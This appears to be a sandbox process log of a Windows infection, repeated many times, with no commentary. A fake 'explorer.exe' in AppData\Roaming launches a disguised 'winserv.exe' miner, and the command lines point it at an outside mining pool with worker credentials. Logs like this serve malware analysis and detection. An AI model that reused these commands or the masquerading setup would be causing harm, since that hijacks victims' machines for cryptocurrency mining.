C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
